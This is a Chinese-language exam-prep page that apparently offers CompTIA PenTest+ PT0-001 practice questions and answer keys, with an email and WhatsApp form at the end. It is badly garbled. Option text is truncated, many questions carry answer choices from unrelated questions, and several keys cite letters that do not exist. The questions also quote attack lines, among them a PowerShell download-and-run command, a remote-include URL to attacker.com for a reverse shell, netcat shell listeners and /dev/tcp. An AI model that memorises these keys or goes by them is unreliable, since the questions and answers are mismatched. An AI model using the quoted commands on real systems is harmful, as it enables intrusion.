不想錯過任何事?

通過認證考試的技巧

最新考試新聞和折扣資訊

由我們的專家策劃和更新

是的,請向我發送時事通訊

有效備考的最新 CompTIA PenTest+ PT0-001 考試試題

您是否正在準備 CompTIA PenTest+ PT0-001 考試並需要有效的學習材料?請不要再猶豫了!我們全面的考試問題和答案集合、精心製作的測試問題以及寶貴的考試資源將幫助您充滿信心地備考。我們的模擬考試旨在模擬真實考試體驗,是您備考策略的重要組成部分。通過模擬考試,您可以評估自己的知識水平,確定需要改進的地方,並掌握順利通過考試所需的技能。通過我們精心策劃的學習材料和模擬考試,您將對滲透測試的概念、工具和技術有深入的了解。無論您是經驗豐富的專業人士,還是剛剛開始網絡安全之旅,我們的資源都能滿足您的需求,確保您在考試當天取得成功。
參加其他線上考試

問題 #1
滲透測試約定協議的下列哪項屬性對觀察和測試最高負載下的生產系統影響最大?
A. 建關鍵生產系統範圍
B. 定測試訪問時間安排
C. 立白盒測試參與
D. 管理層籤字批准侵入性測試
查看答案
正確答案: B
問題 #2
在以下哪種情況下,測試人員會執行 Kerberoasting 攻擊?
A. 試人員入侵了 Windows 設備並泄露了 LSA 祕密。
B. 試人員需要檢索 SAM 數據庫並破解密碼哈希值。
C. 試人員已入侵了一個權限有限的用戶,需要對其他賬戶進行橫向移動。
D. 試人員入侵了一個賬戶,需要從系統中轉儲哈希值和明文密碼。
查看答案
正確答案: C
問題 #3
滲透測試人員準備進行 API 測試。以下哪項對準備這項工作最有幫助?
A. ikto
B. 戰爭
C. 3AF
D. wagger
查看答案
正確答案: D
問題 #4
經過多次嘗試後,攻擊者使用自己的真實指紋通過生物識別傳感器獲得了未經授權的訪問權限,但沒有被利用。以下哪項最有可能解釋所發生的情況?
A. 物識別設備更傾向於誤報。
B. 物識別設備的配置更傾向於真陰性。
C. 物識別設備設置爲故障關閉。
D. 物識別設備複製了有效用戶的指紋。
查看答案
正確答案: A
問題 #5
漏洞掃描發現 SSL 證書與主機名不匹配,但客戶對此發現提出異議。滲透測試人員可以使用以下哪種技術來判斷發現的有效性?
A. 確保掃描儀可以向外發出 DNS 請求。
B. 確保掃描儀配置爲執行 ARP 解析。
C. 保掃描儀配置爲分析 IP 主機。
D. 保掃描儀已加載適當的插件。
查看答案
正確答案: A
問題 #6
在以下哪種情況下,測試人員會執行 Kerberoasting 攻擊?
A. 試人員入侵了 Windows 設備並泄露了 LSA 祕密。
B. 試人員需要檢索 SAM 數據庫並破解密碼哈希值。
C. 試人員入侵了一個權限有限的用戶,需要針對其他賬戶進行橫向移動。
D. 試人員入侵了一個賬戶,需要從系統中轉儲哈希值和明文密碼。
查看答案
正確答案: C
問題 #7
滲透測試人員被要求使用公司提供的包含 IP 地址列表的文本文件,使用 Nmap 進行操作系統指認。進行此掃描需要以下哪些步驟?
A. 錄遍歷
B. 站腳本
C. 程文件包含
D. 用戶枚舉
查看答案
正確答案: BE
問題 #8
一名安全顧問正試圖使用先前識別的用戶帳戶攻擊一臺設備,他正在執行以下哪種類型的攻擊?
A. rpspoof -c both -r -t 192
B. rpspoof -t 192
C. rpspoof -c both -t 192
D. rpspoof -r -t 192
查看答案
正確答案: D
問題 #9
給出以下腳本:以下哪項最能描述該腳本的目的?
A. 收集日誌
B. 事件收集
C. 鍵監控
D. 試信息收集
查看答案
正確答案: C
問題 #10
一家公司對其環境進行了年度滲透測試。除了幾項新發現外,所有以前發現的問題在最新報告中都繼續存在。以下哪項最有可能是原因?
A. 基礎設施正在被類似的硬件和軟件取代。
B. 統管理員應用了錯誤的補丁。
C. 組織沒有採取行動補救已發現的問題。
D. 透測試工具配置錯誤。
查看答案
正確答案: C
問題 #11
滲透測試人員入侵了一臺主機。以下哪種語法是在設備上創建 Netcat 監聽器的正確語法?
A. c -lvp 4444 /bin/bash
B. c -vp 4444 /bin/bash
C. c -p 4444 /bin/bash
D. c -lp 4444 -e /bin/bash
查看答案
正確答案: A
問題 #12
在權限有限的 Windows 系統上嘗試維護持久性時,測試人員應使用以下哪個註冊表鍵值?
A. key_classes_root
B. key_local_machine
C. key_current_user
D. key_current_config
查看答案
正確答案: C
問題 #13
滲透測試人員發現,一個公共網絡服務器上有幾個高位端口正在監聽。但是,系統所有者說應用程序只使用 443 端口。建議最好使用以下哪種方法?
A. 將應用程序過渡到另一個端口。
B. 將 443 端口過濾爲特定 IP 地址。
C. 施網絡應用程序防火牆
D. 禁用不需要的服務。
查看答案
正確答案: D
問題 #14
評估員開始對 Windows 域 internal.comptia.net 進行內部安全測試。評估員通過 DHCP 獲得網絡訪問權限,但未獲得任何網絡地圖或目標 IP 地址。評估員可以使用以下哪些命令來查找任何可能的 Windows 域控制器?
A. 用路徑修改來擺脫應用程序的框架。
B. 建一個覆蓋應用程序的框架。
C. 入包含 JavaScript 的惡意 iframe。
D. 遞惡意的 iframe 屬性。
查看答案
正確答案: A
問題 #15
在一次內部網絡滲透測試中,一名測試人員爲一個已知在多個目標系統上擁有完全管理員權限的用戶找回了 NTLM 密碼散列。以下哪項是繼續開發的最佳目標?
A. 作系統:Windows 7開放端口:23, 161
B. 作系統:Windows Server 2016開放端口:53, 5900
C. 作系統:Windows 8
D. 作系統:Windows 8開放端口:514, 3389
查看答案
正確答案: C
問題 #16
滲透測試人員對目標系統進行了多次漏洞掃描。以下哪項是憑證掃描所獨有的?
A. 發現的漏洞利用程序
B. 詳細的服務配置
C. 打補丁的第三方軟件
D. 問控制配置薄弱
查看答案
正確答案: A
問題 #17
某公司聘請了一名滲透測試人員對公司 DMZ 中的一個應用程序進行評估。在進行測試之前,滲透測試人員的 IP 地址應在以下哪種解決方案中列入白名單?
A. AF
B. HIDS
C. IDS
D. LP
查看答案
正確答案: C
問題 #18
一名顧問希望掃描一臺已識別設備上的所有 TCP 端口。以下哪種 Nmap 交換機可以完成這項任務?
A. p-
B. p ALL
C. p 1-65534
D. 端口 1-65534
查看答案
正確答案: A
問題 #19
模擬您是一名滲透測試人員,正在對服務器進行端口掃描。說明第 1 部分:給定輸出,從可用選項中構建用於生成該輸出的命令:第 2 部分:適當構建命令後,使用給定輸出確定應進一步調查的潛在攻擊向量。
A. 案見說明部分。
查看答案
正確答案: A
問題 #20
滲透測試人員正在進行代碼審查。正在執行以下哪種測試技術?
A. 動態分析
B. 模糊分析
C. 靜態分析
D. 運行時分析
查看答案
正確答案: C
問題 #21
滲透測試人員在獲得 Linux 系統的初始低權限訪問權限後,在用戶的主文件夾中發現了一個名爲 "changepass "的有趣二進制文件。"-sr-xr-x 1 root root 6443 2017 年 10 月 18 日 /home/user/changepass使用 "字符串 "從 changepass 中打印 ASCII 可打印字符,測試人員注意到以下內容:$ strings changepassexitsetuidstrcmpGLIBC_2.0ENV_PATH%s/changepwmallocstrlenGiven this information, which of the following is the MOST likely path of exploitation to achieve root privileges on
A. changepass 複製到一個可寫目錄,並將 ENV_PATH 環境變量導出爲名爲 changepw 的竊取令牌二進制文件的路徑。然後運行 changepass。
B. 在同一目錄下創建一個 changepass 副本,命名爲 changepw。將 ENV_PATH 環境變量導出爲路徑"/home/user/"。然後運行 changepass。
C. ENV_PATH 環境變量導出爲一個可寫目錄的路徑,該目錄包含一個名爲 changepw 的竊取令牌的二進制文件。然後運行 changepass。
D. ENV_PATH 環境變量導出爲"/usr/local/bin "路徑後,使用 sudo 在當前目錄下運行 changepass。
查看答案
正確答案: D
問題 #22
一家醫療機構必須遵守當地法規,保護和證明受保個人的個人健康信息。在進行評估時,滲透測試人員應特別測試以下哪種情況?(請選擇兩項)。
A. 對高管的短信攻擊
B. 對特定團隊發動電子郵件攻擊
C. USB 密鑰空投隨機用戶
D. 一個組織爲目標進行灌水攻擊
查看答案
正確答案: DE
問題 #23
當自動掃描程序在靜態 HTML 網頁上報告漏洞時,以下哪些漏洞最有可能是誤報?(選擇兩個)。
A. 安全的服務和協議配置
B. 行 SMB 和 SMTP 服務
C. 碼複雜性和用戶賬戶薄弱
D. 配置錯誤
查看答案
正確答案: FG
問題 #24
請考慮以下 PowerShell 命令:powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1");Invoke-CmdletWhich of the following BEST describes the actions performed by this command?
A. 設置執行策略
B. 行遠程腳本
C. 行編碼命令
D. 例化一個對象
查看答案
正確答案: B
問題 #25
經過最近的滲透測試,一家公司發現其員工使用字典和季節性密碼。以下哪項是補救使用普通字典術語的最佳控制措施?
A. 密碼長度從 7 個字符擴展到 14 個字符。
B. 施密碼歷史限制
C. 置密碼過濾器/
D. 在五次錯誤嘗試後禁用賬戶。
E. 少密碼過期窗口。
查看答案
正確答案: A
問題 #26
攻擊者使用 SET 複製了一家公司的雲託管網絡郵件門戶,並發送電子郵件希望首席執行官 (CEO) 登錄以獲取 CEO 的登錄憑據。這是以下哪種攻擊類型的示例?
A. 導攻擊
B. 冒攻擊
C. 叉式網絡釣魚攻擊
D. 渡式下載攻擊
查看答案
正確答案: A
問題 #27
在監控 WAF 日誌時,安全分析員發現了針對以下 URL 的成功攻擊: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.phpWhich 應採取以下哪些補救措施來防止此類攻擊?
A. 行黑名單。
B. 阻止 URL 重定向
C. 參數進行雙 URL 編碼。
D. 停止應用程序的外部調用。
查看答案
正確答案: B
問題 #28
一個軟件開發團隊最近在內部環境中遷移到了新的應用軟件。滲透測試結果顯示存在多個漏洞。如果滲透測試人員無法訪問實時或測試環境,最好在虛擬機上創建相同的環境進行測試。以下哪項對確認最爲重要?
A. ashcat -m 5600 -r rules/bestG4
B. ashcat -m 5600 hash
C. ashcat -m 5600 -a 3 hash
D. ashcat -m 5600 -o results
查看答案
正確答案: A
問題 #29
滲透測試人員在完成基礎架構方面的工作後,需要對目標公司的員工進行操作系統情報分析。以下哪項是滲透的最佳步驟?
A. 給公司打電話,利用社交工程技術獲取員工信息。
B. 訪客戶,利用假冒身份從工作人員那裡獲取信息。
C. 員工發送欺騙性電子郵件,看員工是否會回復敏感信息。
D. 在互聯網上搜索有關工作人員的信息,如社交網站。
查看答案
正確答案: D
問題 #30
在進行漏洞掃描之前,滲透測試人員正在對一些遠程主機進行初步情報搜集。測試人員運行以下命令:nmap -D 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130以下哪項 BEST 描述了指定多個 IP 地址的原因?
A. 絡子網爲 a/25 或更大,測試人員需要訪問兩個不同子網的主機。
B. 試人員試圖通過加入幾個假地址來執行更隱蔽的掃描。
C. 描儀有多個接口,可按指定速率平衡掃描請求。
D. 第一組地址進行發現掃描,而對後一組主機進行更深入、更積極的掃描。
查看答案
正確答案: B
問題 #31
一名滲透測試人員正試圖通過監控 WPA2-PSK 安全無線網絡捕獲客戶端與接入點之間的握手。測試人員正在監控所識別網絡的正確信道,但未能成功捕獲握手。在這種情況下,以下哪種攻擊能幫助測試人員獲取握手信號?
A. 因果報應攻擊
B. 驗證攻擊
C. 片攻擊
D. SDI 廣播洪水
查看答案
正確答案: B
問題 #32
滲透測試人員報告說,一個面向互聯網的應用程序只使用了基本身份驗證。以下哪項是最佳修復策略?
A. 用 HTTP 嚴格傳輸安全性。
B. 用安全 cookie 標誌
C. 密通信信道
D. 清除無效的用戶輸入。
查看答案
正確答案: A
問題 #33
一名滲透測試人員成功利用了某組織身份驗證服務器上的一個漏洞,現在想建立一個反向 shell。滲透測試人員發現目標上的 Netcat 不可用,以下哪種方法適合嘗試 NEXT?
A. 運行 xterm 連接到目標的 X 服務器。
B. 試提升權限以獲取交互式 shell。
C. 試使用 /dev/tcp 套接字。
D. 試讀出/etc/shadow。
查看答案
正確答案: C
問題 #34
一名在編的初級技術人員進行了一次滲透測試。在測試過程中,技術人員發現網絡應用程序可能會泄露包含用戶賬戶和密碼信息的 SQL 表。以下哪種方法最能有效地向管理層通報這一發現及其重要性?
A. 用執行摘要、建議和網絡應用程序披露截圖記錄調查結果。
B. 使用此信息連接 SQL 服務器,並更改一到兩個非關鍵賬戶的密碼,以向管理層演示概念驗證。
C. 發現的情況通知開發團隊,並建議由專業滲透測試公司實施輸入驗證。
D. 要求管理層制定一份招標書,開始與專業滲透測試公司正式接洽。
查看答案
正確答案: A
問題 #35
DRAG DROPA 管理員要求測試人員協助診斷以下 Python 腳本中的問題:#!/usr/bin/pythons = "Administrator "測試人員懷疑這是字符串切片和操作的問題。分析以下代碼段,並將每個字符串操作的正確輸出拖放到相應的代碼段中。選項可使用一次或完全不使用:
A. 案見說明部分。
查看答案
正確答案: A
問題 #36
一名安全分析師收到了一份詳細的滲透報告,該報告是針對該組織的 DMZ 環境執行的。報告指出,有一項發現的 CVSS 基本分值爲 10.0。利用此漏洞需要達到以下哪種難度級別?
A.
B. 點困難;需要強大的處理能力才能利用。
C. 不足道;利用這一發現幾乎不費吹灰之力。
D. 可能;外部主機已加固以防止攻擊。
查看答案
正確答案: C
問題 #37
黑盒滲透測試策略爲測試人員提供了以下功能:
A. 目標清單
B. 網絡圖
C. 代碼
D. 特權憑證
查看答案
正確答案: D
問題 #38
一名滲透測試人員通過對一名 IT 部門人員進行網絡釣魚,獲取了初始 VPN 用戶域憑據。之後,滲透測試人員通過 VPN 獲取了哈希值,並使用字典攻擊輕鬆破解了它們。建議採取以下哪些補救措施?(請選擇三個)。
A. 硬件供應商
B. 信道幹擾
C. 戶名
D. 主要優勢
查看答案
正確答案: BCG
問題 #39
以下哪段摘錄來自公司政策?
A. 工密碼必須至少包含八個字符,其中一個爲字母數字。
B. 撥打 800-passwd1 聯繫服務臺,進行密碼重置。
C. 工必須使用強大的密碼訪問公司資產。
D. 司系統必須使用 MD5 哈希算法存儲密碼。
查看答案
正確答案: D
問題 #40
一名滲透測試人員獲得了一名營銷人員設備的訪問權限。滲透測試人員希望確保一旦訪問被發現,可以重新獲得設備控制權。滲透測試人員應使用以下哪些操作來保持對設備的持久性?(請選擇兩項)。
A. 頭蛇
B. 膛手約翰
C. ashcat
D. each
查看答案
正確答案: AC
問題 #41
在計劃訂婚時,以下哪項最重要?(請選擇兩項)。
A. 行端口掃描。
B. 取網絡服務器的橫幅。
C. TTY 重定向到遠程系統。
D. 除所提供 IP 的錯誤日誌。
查看答案
正確答案: AC
問題 #42
滲透測試人員正在執行遠程掃描,以確定服務器羣是否符合公司的軟件基線。滲透測試人員應執行以下哪些操作來驗證是否符合基線?
A. 現掃描
B. 形掃描
C. 面掃描
D. 證掃描
查看答案
正確答案: A
問題 #43
滲透測試人員向客戶提交網絡應用程序漏洞掃描報告。滲透測試人員將一個漏洞評爲中等嚴重性。在上一份報告中,同一漏洞被報告爲嚴重級別。以下哪項最有可能是嚴重性降低的原因?
A. 客戶在未更新版本的情況下應用了熱修復。
B. 脅形勢發生了重大變化。
C. 戶更新了代碼庫,增加了新功能。
D. 前沒有針對此漏洞的已知漏洞利用。
查看答案
正確答案: A
問題 #44
滲透測試員喬被要求通過進入一家公司的辦公室來評估該公司的實體安全。喬正在尋找一種方法,使他能夠在營業時間或沒有員工在現場時進入大樓。以下哪種方法最有效?
A. 章克隆
B. 鎖
C. 尾隨
D. 捎帶
查看答案
正確答案: A
問題 #45
滲透測試人員在不同的網絡上對一個新的 Linux 設備進行了透視。測試人員編寫了以下命令:for m in {1..254..1};do ping -c 1 192.168.101.$m; done以下哪項最好地描述了運行此命令的結果?
A. 口掃描
B. 服務枚舉
C. 體寄主識別
D. 絕服務
查看答案
正確答案: C
問題 #46
一名顧問正在對客戶實施社會工程學攻擊。該顧問通過網絡釣魚活動收集了大量用戶名和密碼。顧問獲得了登錄不同員工電子郵件帳戶的憑證。根據調查結果,顧問應建議實施以下哪些措施?
A. 密碼政策
B. 碼加密
C. 子郵件系統加固
D. 因素身份驗證
查看答案
正確答案: D
問題 #47
以下哪項對安全評估的預算有直接和重大影響?
A. 範圍界定
B. 時間安排
C. 合規要求
D. 目標風險
查看答案
正確答案: D
問題 #48
一名滲透測試人員爲一家初創公司進行了一次安全評估。報告共列出十個漏洞,其中五個被確定爲關鍵漏洞。客戶沒有資源立即修復所有漏洞。在這種情況下,以下哪項是給客戶的最佳建議?
A. 要刪除持久性
B. 啓用持久性
C. 報告持久性
D. 檢查持久性
查看答案
正確答案: D
問題 #49
滲透測試人員向客戶提交網絡應用程序漏洞掃描報告。滲透測試人員將一個漏洞評爲中等嚴重性。在上一份報告中,同一漏洞被報告爲嚴重級別。以下哪項最有可能是嚴重性降低的原因?
A. 戶在未更新版本的情況下應用了熱修復程序。
B. 脅形勢已發生重大變化。
C. 戶更新了代碼庫,增加了新功能。
D. 前還沒有針對此漏洞的已知漏洞利用。
查看答案
正確答案: A
問題 #50
滲透測試人員被指派對一家公司進行外部滲透評估。以下哪個步驟最有助於被動信息收集過程?(選擇兩個)。
A. 劇本小子
B. APT 行動者
C. 部威脅
D. 客組織
查看答案
正確答案: DE
問題 #51
滲透測試人員能夠在文本框中輸入 SQL 注入命令,並訪問數據庫中存儲的信息。以下哪項建議是緩解該漏洞的最佳建議?
A. 機化登錄所使用的憑證。
B. 安裝基於主機的入侵檢測。
C. 實現輸入規範化。
D. 進行系統加固
查看答案
正確答案: D
問題 #52
以下哪段摘錄來自公司政策?
A. 工密碼必須至少包含八個字符,其中一個爲字母數字。
B. 撥打 800-passwd1 聯繫服務臺,進行密碼重置。
C. 工在訪問公司資產時必須使用強大的密碼。
D. 業系統必須使用 MD5 哈希算法存儲密碼。
查看答案
正確答案: D
問題 #53
一名滲透測試人員正在測試一個銀行應用程序,發現了一個漏洞。測試人員是以非特權用戶身份登錄的,他不應該訪問任何數據。下面是來自網絡攔截代理的數據:以下哪種類型的漏洞正在被利用?
A. 制瀏覽漏洞
B. 易受污染的參數
C. 件上傳漏洞
D. ookie 枚舉
查看答案
正確答案: D
問題 #54
一名惡意用戶想對一臺計算機實施 MITM 攻擊。計算機網絡配置如下:IP:192.168.1.20NETMASK:255.255.255.0默認網關:192.168.1.254DHCP:192.168.1.253DNNS:192.168.10.10, 192.168.20.10惡意用戶應執行以下哪些命令來執行 MITM 攻擊?
A. 名單可防止針對 IPS 和支持日誌監控系統的無意 DoS 攻擊。
B. 三方 IPS 系統的滲透測試通常需要額外的文件和授權;可能會延誤時間敏感的測試。
C. PS白名單規則需要經常更新以保持最新,不斷開發漏洞和新發現的弱點。
D. 測試應側重於發現所有範圍內系統可能存在的安全問題,而不是確定 IPS 等主動防禦系統的相對有效性。
查看答案
正確答案: B
問題 #55
滲透測試人員擁有域控制器的完整 shell,希望發現 21 天內未對域進行身份驗證的任何用戶帳戶。以下哪條命令能最好地實現這一目標?
A. srm -users "DN=company
B. suser -name -account -limit 3
C. squery user -inactive 3
D. squery -o -rdn -limit 21
查看答案
正確答案: D
問題 #56
在物理安全評估過程中使用 "門下工具 "屬於以下哪種類型的入侵技術?
A. 禁用受影響服務的網絡端口。
B. 成所有調查結果,然後提交給客戶。
C. 時向客戶通報調查結果的詳情。
D. 目標脫機,使其無法被攻擊者利用。
查看答案
正確答案: D
問題 #57
客戶要求滲透測試人員爲正在進行的測試添加更多地址。以下哪項可以定義目標列表?
A. 交戰規則
B. 母校服務協議
C. 工作說明
D. 終用戶許可協議
查看答案
正確答案: C
問題 #58
滲透測試人員成功利用了一個 DMZ 服務器,該服務器似乎正在監聽一個出站端口。滲透測試人員希望將該流量轉發回一臺設備。下面哪些工具是用於此目的的最佳工具?(選擇兩個)。
A. ig -q any _kerberos
B. ig -q any _lanman
C. ig -q any _ntlm
D. ig -q any _smtp
查看答案
正確答案: BD
問題 #59
滲透測試人員被要求使用公司提供的包含 IP 地址列表的文本文件,使用 Nmap 進行操作系統指認。進行此掃描需要以下哪些內容?
A. 行零日漏洞
B. 用已知密碼創建一個新的域用戶。
C. 改已知的啓動時間服務以實例化回調。
D. 取被入侵用戶的明文憑據。
查看答案
正確答案: AB
問題 #60
滲透測試人員在外部漏洞掃描過程中發現了以下結果:根據上述掃描結果,應優先考慮以下哪種攻擊策略?
A. 附錄
B. 執行摘要
C. 技術摘要
D. 主體
查看答案
正確答案: D
問題 #61
基於消費者的物聯網設備通常不如爲傳統臺式電腦構建的系統安全。以下哪項最能說明這種情況的原因?
A. sfconsole
B. 工作空間
C. sfvenom
D. b_init
E. b_connect
查看答案
正確答案: A
問題 #62
拖放根據所代表的字符集,按複雜程度從最不複雜 (1) 到最複雜 (4) 的順序排列以下每個密碼。每個密碼只能使用一次:
A. 案見說明部分。
查看答案
正確答案: A
問題 #63
一位客戶對被遠程攻擊者入侵的公司數量表示擔憂,這些攻擊者正在尋找商業機密。以下哪項最恰當地描述了這將確定的對手類型?
A. 通過動態代碼分析器運行應用程序。
B. 用模糊測試工具
C. 編譯應用程序
D. 檢查內存分配。
查看答案
正確答案: B
問題 #64
一家能源公司與一家安全公司籤訂合同,對一家發電廠進行滲透測試,該發電廠採用 ICS 管理髮電和冷卻。以下哪項是公司在準備評估時必須考慮的此類環境的獨特因素?
A. 選擇一套適當的安全測試工具
B. 綜合控制系統組件的額定電流和負載
C. 潛在的運行和安全隱患
D. 測試所用硬件的電氣認證
查看答案
正確答案: A
問題 #65
某客戶計劃進行一次無線滲透測試。以下哪項描述了測試開始前最可能需要的範圍目標信息?
A. 要測試的物理位置和網絡 ESSID
B. 戶擁有的無線設備數量
C. 戶首選的無線接入點供應商
D. 戶設備使用的頻段和頻率
查看答案
正確答案: D
問題 #66
滲透測試員喬收到了基本賬戶憑證並登錄了 Windows 系統。爲了提升權限,他使用 Mimikatz 從以下哪個地方獲取憑據?
A. ID 循環列舉用戶和用戶組
B. 過哈希值轉發證書
C. 行輸入密碼登錄主機
D. 話劫持,冒充系統賬戶
查看答案
正確答案: C
問題 #67
在爲一家公司進行安全評估後,發現客戶的測試環境無法使用的時間被計費。客戶聲稱被不公平地收取了費用。在這種情況下,以下哪份文檔最有可能提供指導?
A. 額外費率
B. 公司政策
C. 耐衝擊性
D. 行業類型
查看答案
正確答案: D

提交後看答案

請提交您的電子郵件和WhatsApp以獲取問題的答案。

注意:請確保您的電子郵件 ID 和 Whatsapp 有效,以便您獲得正確的考試結果。

電子郵件:
WhatsApp/電話號碼: